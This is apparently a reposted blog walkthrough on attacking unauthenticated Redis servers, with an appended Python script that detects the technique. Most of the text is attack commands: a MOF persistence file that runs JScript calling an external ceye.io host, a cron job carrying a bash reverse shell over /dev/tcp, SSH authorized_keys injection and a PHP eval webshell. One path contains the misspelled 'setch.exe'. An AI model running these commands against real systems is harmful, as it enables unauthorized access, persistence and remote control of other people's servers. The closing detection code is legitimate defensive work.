Tool download:
https://github.com/r35tart/RedisWriteFile
Run the following command:
python2 RedisWriteFile.py --rhost=<target ip> --rport=<target port> --lhost=<local ip> --lport=<local port> --rpath="<target path>" --rfile="<target file name>" --lfile="<local file name>"
(the target machine and the local machine must be able to reach each other)
1. Write a webshell
2. Write to the user's Startup folder
C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
This still requires the user to restart.
3. Hijacking (high privilege)
System DLL hijacking
Overwrite the sticky-keys binary C:\windows\system32\setch.exe (requires port 3389 to be open)
4. MOF (for Windows Server 2003 machines)
Write the following file: C:/windows/system32/wbem/mof/nullevt.mof
Contents:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"ping sfas.g9bubn.ceye.io \")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Listen on the server:
nc -lvvp 8888
Run on Redis:
root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set xx "\n* * * * * bash -i >& /dev/tcp/<listener ip>/8888 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
Generate a key pair:
ssh-keygen -t rsa
Write id_rsa.pub into a buffer:
(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > key.txt  # the leading and trailing \n newlines keep the key from being mixed with other cached data in Redis
cat key.txt | redis-cli -h 192.168.0.114 -x set crack
Connect to the target Redis:
redis-cli -h 192.168.0.114
Run the following commands through Redis:
config set dir /root/.ssh
config set dbfilename authorized_keys
save
config set dir /home/kali/Desktop
config set dbfilename shell.php
set 1 "<?php @eval($_POST['fuck']);?>"
save
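The cron, authorized_keys and shell.php writes above all rely on the same Redis sequence: CONFIG SET dir, CONFIG SET dbfilename, then SAVE. That sequence is also what a defender can alert on. The following Python is an added example, not part of the original post: it parses constructed Redis MONITOR-style log lines and flags a SAVE/BGSAVE that follows a per-client change of dir or dbfilename; the SENSITIVE_DIRS and SENSITIVE_EXTS watchlists are my own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in Redis MONITOR output format:
#   <timestamp> [<db> <client ip:port>] "COMMAND" "arg" ...
SAMPLE_MONITOR = """\
1623456789.100000 [0 192.168.63.5:50210] "set" "xx" "payload"
1623456789.200000 [0 192.168.63.5:50210] "config" "set" "dir" "/var/spool/cron/"
1623456789.300000 [0 192.168.63.5:50210] "config" "set" "dbfilename" "root"
1623456789.400000 [0 192.168.63.5:50210] "save"
1623456790.000000 [0 192.168.63.9:41022] "get" "session:42"
1623456791.000000 [0 192.168.63.9:41022] "config" "set" "dir" "/var/lib/redis"
"""

# Assumed watchlists: places an RDB dump should never land.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/.ssh", "/var/www", "/wbem/mof")
SENSITIVE_EXTS = (".php", ".jsp", ".aspx", ".mof", "authorized_keys")

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.+)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_args(rest):
    """Split the double-quoted MONITOR arguments and drop backslash escapes."""
    return [re.sub(r'\\(.)', r'\1', a) for a in ARG_RE.findall(rest)]

def detect_rdb_file_writes(monitor_text):
    """Track CONFIG SET dir/dbfilename per client; alert when that client then saves."""
    pending = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in monitor_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = parse_args(m.group("rest"))
        if not args:
            continue
        cmd, client = args[0].lower(), m.group("client")
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set" \
                and args[2].lower() in ("dir", "dbfilename"):
            pending[client][args[2].lower()] = args[3]
        elif cmd in ("save", "bgsave") and pending[client]:
            d = pending[client].get("dir", "")
            f = pending[client].get("dbfilename", "")
            targeted = any(s in d for s in SENSITIVE_DIRS) or f.endswith(SENSITIVE_EXTS)
            alerts.append({"ts": m.group("ts"), "client": client, "dir": d,
                           "dbfilename": f, "severity": "high" if targeted else "medium"})
            pending.pop(client)
    return alerts

if __name__ == "__main__":
    for alert in detect_rdb_file_writes(SAMPLE_MONITOR):
        print(alert)
```

A client that changes dir but never saves (the second client in the sample) produces no alert; a save into a non-watchlisted directory is still reported at medium severity because CONFIG SET dir from a client is itself unusual. Pair this with requirepass, protected-mode and rename-command for CONFIG in redis.conf so the sequence is blocked rather than only observed.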
Source: https://www.cnblogs.com/sakura521/p/14969440.html